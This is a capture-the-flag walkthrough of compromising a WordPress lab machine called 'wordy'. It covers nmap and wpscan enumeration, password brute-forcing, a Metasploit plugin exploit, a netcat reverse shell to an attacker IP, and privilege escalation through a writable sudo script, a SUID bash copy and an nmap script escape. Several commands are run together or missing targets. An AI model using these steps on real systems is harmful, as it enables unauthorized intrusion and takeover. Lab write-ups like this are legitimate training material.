1. Network discovery
nmap -sn

The target is

2. Host file

Reading technical information, I have to edit the host file.

nano /etc/hosts

3.Port scan

nmap -Pn -Pn -p1000-

There’re 2 open ports: 22 and 80.

4. OS and service scan

nmap -A -p22,80

Scanning revealed this site is WordPress version 5.1.1.

5. Vuln scan

nmap --script vuln -p22,80

I have some possible vulnerabilities plus a list of usernames.

6. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://wordy/ -x php,txt,html,sh,cgi -q

7. WPscan

wpscan --url http://wordy/ -et -ep -eu

A similar result to nmap’s vuln scan.

8. Nmap word press enum script

nmap -sV --script http-wordpress-enum

I have themes and plugins.

9. Access HTTP site


Explore everything

10. Exploitation

After searching exploits of apache 2.4.5 and WordPress 5.5.1. I’ve found nothing which is useful.

I will guess Login credential starting w/ same set of username and password (some people use the same string for both fields):

admin : admin
graham : graham
mark : mark
sarah : sarah
jens : jens

All failed

Since there’s nothing more I can do (as I know of), I’ll have to brute-forcing username and password.

Starting w/ the clue I will not spend forever cracking these. I’ll use it.

NOTE: my rockyou.txt is located on Desktop

cat /root/Desktop/rockyou.txt | grep k01 > passwords.txt

Crack the password using wpscan

wpscan --url http://wordy/ -et -ep -eu -P passwords.txt

After waiting for a while, I got username and password

mark : helpdesk01

There are no any functions that I can edit PHP file to get a reverse shell.

Moving on to the plugins, they may reveal some vulnerabilities.

Starting w/ akismet

Edit the script to match our scenario.


Next, user-role-editor 4.24. I came across this. It’s custom script for metasploit framework.

I used this as a guide to import a custom script.

Let’s try

msfconsoleuse exploit/remote/http/wordpress/44595show options
set username markset password helpdesk01set rhosts wordyrun 


Back to the site, there’s another ‘Activity Monitor’ left.

I googled up, I found this script to get a reverse shell.

Prepare listener on port 1234

rlwrap nc -lvp 1234

Edit the command

nc <attacker ip> 1234 -e /bin/bash

Open the script and click ‘Submit request’

Back to the listener, now I have a shell but I need a TTY shell for more convenience.

I’ll try to get it w/ python

which pythonpython -c 'import pty;pty.spawn("/bin/bash");'

11. Privilege escalation

Expore /home, I came across ‘things-to-do.txt’ in /home/mark/stuff/

cat things-to-do.txt

Now I got graham’s password.

change user to graham

su graham<password>

Verify sudo

sudo -l

I can run this file w/ username ‘jens’

Read the file first.

cat /home/jens/

My idea is this script is belongs to jens and I can use it w/o supplying any password. So I can edit and input some commands to get a /bin/bash shell belonging to jens.

echo "cp /bin/bash /tmp/rootbash" >> /home/jens/backups.shecho "chmod +xs /tmp/rootbash" >> /home/jens/

echo "/tmp/rootbash -p" >> /home/jens/


cat /home/jens/

Run the sudo command

sudo -u jens /home/jens/

Now I’m jens.

Verify sudo again.

sudo -l

jens can run nmap command

Looking up in the GTFOBins guide, I have 2 options.

I’ll start w/ b. option.

sudo nmap --ineractive


I’ll try w/ a. option

TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFsudo nmap --script=$TFwhoami

Now, I’m root.

Get the flag

cd /rootls -lacat theflag.txt